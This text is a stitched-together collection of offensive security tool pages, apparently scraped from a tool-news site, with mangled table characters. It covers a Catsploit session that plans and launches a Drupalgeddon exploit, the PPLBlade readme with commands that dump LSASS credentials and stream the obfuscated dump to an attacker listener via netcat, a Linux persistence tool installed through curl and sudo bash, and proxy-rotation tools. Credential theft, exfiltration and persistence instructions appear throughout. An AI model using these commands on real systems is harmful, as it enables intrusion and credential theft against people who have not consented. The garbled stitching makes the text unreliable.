β 192.168.0.10 β tcp β 80 β Drupal Coder RCE Vulnerability (SA-CONTRIB-2016-039) - Active Check β N/A β
β 192.168.0.10 β tcp β 80 β Sensitive File Disclosure (HTTP) β N/A β
β 192.168.0.10 β tcp β 80 β Unprotected Web App / Device Installers (HTTP) β N/A β
β 192.168.0.10 β tcp β 80 β Cleartext Transmission of Sensitive Information via HTTP β N/A β
β 192.168.0.10 β tcp β 80 β jQuery < 1.9.0 XSS Vulnerability β CVE-2012-6708 β
β 192.168.0.10 β tcp β 80 β jQuery < 1.6.3 XSS Vulnerability β CVE-2011-4969 β
β 192.168.0.10 β tcp β 80 β Drupal 7.0 Information Disclosure Vulnerability - Active Check β CVE-2011-3730 β
β 192.168.0.10 β tcp β 631 β SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β CVE-2016-2183 β
β 192.168.0.10 β tcp β 631 β SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β CVE-2016-6329 β
β 192.168.0.10 β tcp β 631 β SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β CVE-2020-12872 β
β 192.168.0.10 β tcp β 631 β SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection β CVE-2011-3389 β
β 192.168.0.10 β tcp β 631 β SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection β CVE-2015-0204 β
ββββββββββββββββ΄ββββββββ΄βββββββ΄ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ΄βββ& #9472;βββββββββββββ
[Users]
βββββββββββββ³ββββββββ
β user name β group β
β‘ββββββββββββββββββββ©
βββββββββββββ΄ββββββββ
catsploit> plan attacker h_exbiy6
Planning attack scenario...100%
[*] Done. 15 scenarios was planned.
[*] To check each scenario, try 'scenario list' and/or 'scenario detail'.
catsploit> scenario list
βββββββββββββββ³βββββ ββββββββ³βββββββββββββββββ³ββββββββ³ββββββββ³ββββββββ³ββββββββββββββββββββββββββββββββ
β scenario id β src host ip β target host ip β eVc β eVd β steps β first attack step β
β‘ββββββββββββββββββββββββββββββββββββγ 3;ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β 3d3ivc β 0.0.0.0 β 192.168.0.10 β 1.0 β 32.0 β 1 β exploit/multi/http/jenkins_sβ¦ β
β 5gnsvh β 0.0.0.0 β 192.168.0.10 β 1.0 β 53.76 β 2 β exploit/multi/http/jenkins_sβ¦ β
β 6nlxyc β 0.0.0.0 β 192.168.0.10 β 0.0 β 48.32 β 2 β exploit/multi/http/jenkins_sβ¦ β
β 8jos4z β 0.0.0.0 β 192.168.0.1 0 β 0.7 β 72.8 β 2 β exploit/multi/http/jenkins_sβ¦ β
β 8kmmts β 0.0.0.0 β 192.168.0.10 β 0.0 β 32.0 β 1 β exploit/multi/elasticsearch/β¦ β
β agjmma β 0.0.0.0 β 192.168.0.10 β 0.0 β 24.0 β 1 β exploit/windows/http/manageeβ¦ β
β joglhf β 0.0.0.0 β 192.168.0.10 β 70.0 β 60.0 β 1 β auxiliary/scanner/ssh/ssh_loβ¦ β
β rmgrof β 0.0.0.0 β 192.168.0.10 β 100.0 β 32.0 β 1 β exploit/multi/http/drupal_drβ¦ β
β xuowzk β 0.0.0.0 β 192.168.0.10 β 0.0 β 24.0 β 1 β exploit/multi/http/struts_dmβ¦ β
β yttv51 β 0.0.0.0 β 192.168.0.10 β 0.01 β 53.76 β 2 β exploit/multi/http/jenkins_sβ¦ β
β znv76x β 0.0.0.0 β 192.168.0.10 β 0.01 β 53.76 β 2 β exploit/multi/http/jenkins_sβ¦ β
βββββββββββββββ΄ββββββββββββββ΄βββββββββββββββββ΄ββββββββ΄ββββββββ΄ββββββββ΄ββββββββββββββββββββββββββββββββ
catsploit> scenario detail rmgrof
βββββββββββββββ³βββββββββββββββββ³ββββββββ³βββββββ
β src host ip β target host ip β eVc β eVd β
β‘ββββββββββββββββββββββββββββββββββββββββββββββ©
β 0.0.0.0 β 192.168.0.10 β 100.0 β 32.0 β
βββββββββββββββ΄ββββββββ ββββββββ΄ββββββββ΄βββββββ
[Steps]
βββββ³ββββββββββββββββββββββββββββββββββββββββ³ββββββββββββββββββββββββ
β # β step β params β
β‘βββββββββββββββββββββββββββββββ ββββββββββββββββββββββββββββββββββββ©
β 1 β exploit/multi/http/drupal_drupageddon β RHOSTS: 192.168.0.10 β
β β β LHOST: 192.168.10.100 β
βββββ΄ββββββββββββββββββββββββββββββββββββββββ΄ββββββββββββββββββββββββ
catsploit> attack rmgrof
> ~> ~
> Metasploit Console Log
> ~
> ~
[+] Attack scenario succeeded!
catsploit> exit
Bye.
All informations and codes are provided solely for educational purposes and/or testing your own systems.
For any inquiry, please contact the email address as follows:
catsploit@nk.MitsubishiElectric.co.jp
Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.
Key functionalities:
Overview of the techniques, used in this tool can be found here: https://tastypepperoni.medium.com/bypassing-defenders-lsass-dump-detection-and-ppl-protection-in-go-7dd85d9a32e6
Note that PROCEXP15.SYS is listed in the source files for compiling purposes. It does not need to be transferred on the target machine alongside the PPLBlade.exe.
Itβs already embedded into the PPLBlade.exe. The exploit is just a single executable.
Modes:
Handle Modes:
Basic POC that uses PROCEXP152.sys to dump lsass:
PPLBlade.exe --mode dothatlsassthing
(Note that it does not XOR dump file, provide an additional obfuscate flag to enable the XOR functionality)
Upload the obfuscated LSASS dump onto a remote location:
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234
Attacker host:
nc -lnp 1234 > lsass.dmp
python3 deobfuscate.py --dumpname lsass.dmp
Deobfuscate memory dump:
PPLBlade.exe --mode descrypt --dumpname PPLBlade.dmp --key PPLBlade
Valid8Proxy is a versatile and user-friendly tool designed for fetching, validating, and storing working proxies. Whether you need proxies for web scraping, data anonymization, or testing network security, Valid8Proxy simplifies the process by providing a seamless way to obtain reliable and verified proxies.
Clone the Repository:
git clone https://github.com/spyboy-productions/Valid8Proxy.git
Navigate to the Directory:
cd Valid8Proxy
Install Dependencies:
pip install -r requirements.txt
Run the Tool:
python Valid8Proxy.py
Follow Interactive Prompts:
Save to File:
Check Results:
python Validator.py
Follow the prompts:
Enter the path to the file containing proxies (e.g., proxy_list.txt). Enter the number of proxies you want to validate. The script will then validate the specified number of proxies using multiple threads and print the valid proxies.
Contributions and feature requests are welcome! If you encounter any issues or have ideas for improvement, feel free to open an issue or submit a pull request.
Demonized Shell is an Advanced Tool for persistence in linux.
git clone https://github.com/MatheuZSecurity/D3m0n1z3dShell.git
cd D3m0n1z3dShell
chmod +x demonizedshell.sh
sudo ./demonizedshell.sh
Download D3m0n1z3dShell with all files:
curl -L https://github.com/MatheuZSecurity/D3m0n1z3dShell/archive/main.tar.gz | tar xz && cd D3m0n1z3dShell-main && sudo ./demonizedshell.sh
Load D3m0n1z3dShell statically (without the static-binaries directory):
sudo curl -s https://raw.githubusercontent.com/MatheuZSecurity/D3m0n1z3dShell/main/static/demonizedshell_static.sh -o /tmp/demonizedshell_static.sh && sudo bash /tmp/demonizedshell_static.sh
And other types of features that will come in the future.
If you want to contribute and help with the tool, please contact me on twitter: @MatheuzSecurity
We are not responsible for any damage caused by this tool, use the tool intelligently and for educational purposes only.
PhantomCrawler allows users to simulate website interactions through different proxy IP addresses. It leverages Python, requests, and BeautifulSoup to offer a simple and effective way to test website behaviour under varied proxy configurations.
Features:
Usage:
proxies.txt
in this format 50.168.163.176:80
How to Use:
git clone https://github.com/spyboy-productions/PhantomCrawler.git
pip3 install -r requirements.txt
python3 PhantomCrawler.py
Disclaimer: PhantomCrawler is intended for educational and testing purposes only. Users are cautioned against any misuse, including potential DDoS activities. Always ensure compliance with the terms of service of websites being tested and adhere to ethical standards.